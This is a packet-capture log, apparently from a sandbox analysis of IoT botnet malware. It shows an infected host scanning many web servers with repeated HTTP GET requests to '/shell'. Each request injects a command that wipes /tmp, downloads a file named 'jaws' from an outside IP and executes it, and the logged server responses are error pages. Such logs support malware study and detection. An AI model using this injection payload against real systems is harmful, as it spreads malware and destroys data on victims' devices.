                                                            Jan 26, 2024 15:31:36.579695940 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:36.701977968 CET373INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:36 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            X-XSS-Protection: 1; mode=block
                                                            X-Content-Type-Options: nosniff
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            155192.168.2.235159644.228.83.2380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:36.754030943 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            156192.168.2.233866023.207.85.2580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:36.980433941 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:37.396239042 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:37 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:37 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 66 38 63 32 63 33 31 26 23 34 36 3b 31 37 30 36 32 37 39 34 39 37 26 23 34 36 3b 31 31 31 61 38 61 65 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;9f8c2c31&#46;1706279497&#46;111a8aea</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            157192.168.2.2351710124.223.6.12680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:37.082197905 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:37.457164049 CET306INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 146
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            158192.168.2.2354362168.76.87.980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:37.382339001 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:37.890342951 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            159192.168.2.233342434.107.144.17480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:37.805933952 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            160192.168.2.235206852.202.65.12980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:37.817905903 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:37.933232069 CET306INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 146
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            161192.168.2.2347104184.24.189.6280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:37.924299955 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:38.146161079 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:38 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:38 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 31 30 65 33 63 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 34 39 38 26 23 34 36 3b 32 66 39 66 37 32 62 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;510e3c17&#46;1706279498&#46;2f9f72bc</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            162192.168.2.2352322217.92.132.15080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:37.944780111 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:38.190674067 CET1286INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f
                                                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon"> <title>LANCOM: Error - Not Found</title> <meta charset="ISO-8859-1"> <link rel="stylesheet" type="text/cs
                                                            Jan 26, 2024 15:31:38.191195011 CET1286INData Raw: 0a 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6f 75 74 73 69 64 65 5f 63 6f 6e 74 65 6e 74 5f 61 72 65 61 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6f 75 74 73 69 64 65 5f 62 6f 78 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: <div id="outside_content_area"> <div id="outside_box"> <div id="outside_box_lower"> <div id="outside_noform" class="outside_content_wrapper_style"> <div id="outside_content_wrapper">


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            163192.168.2.235309877.70.177.5080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:41.363986969 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            164192.168.2.2333132172.103.183.22480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:41.395483017 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:41.610344887 CET115INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/plain; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                            Data Ascii: 400 Bad Request


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            165192.168.2.236054299.83.214.2380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:41.398087025 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            166192.168.2.2360120130.254.45.11280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:41.456093073 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:41.685273886 CET115INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/plain; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                            Data Ascii: 400 Bad Request


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            167192.168.2.2342388124.198.30.11580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:41.482784033 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:42.981818914 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:44.741554976 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:48.453072071 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:55.620058060 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:09.698067904 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:38.110085011 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            168192.168.2.2346712119.207.31.17780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:41.495556116 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            169192.168.2.2355194198.143.148.280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:41.508142948 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:41.651329041 CET495INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 13:40:16 GMT
                                                            Server: Apache/2.2.15 (CentOS)
                                                            Content-Length: 301
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.2.15 (CentOS) Server at 127.0.0.1 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            170192.168.2.2353014156.244.93.14380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:41.558393955 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:41.895951986 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:41 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            171192.168.2.2353030156.244.93.14380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:41.576601028 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:41.965775967 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:41 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            172192.168.2.2358712104.77.235.19280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:41.620325089 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:41.745223999 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:41 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:41 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 37 32 37 32 34 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 30 31 26 23 34 36 3b 31 30 38 65 39 38 31 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;d7272417&#46;1706279501&#46;108e9811</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            173192.168.2.2333140185.128.234.280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:41.689714909 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:41.927208900 CET490INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:31:41 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
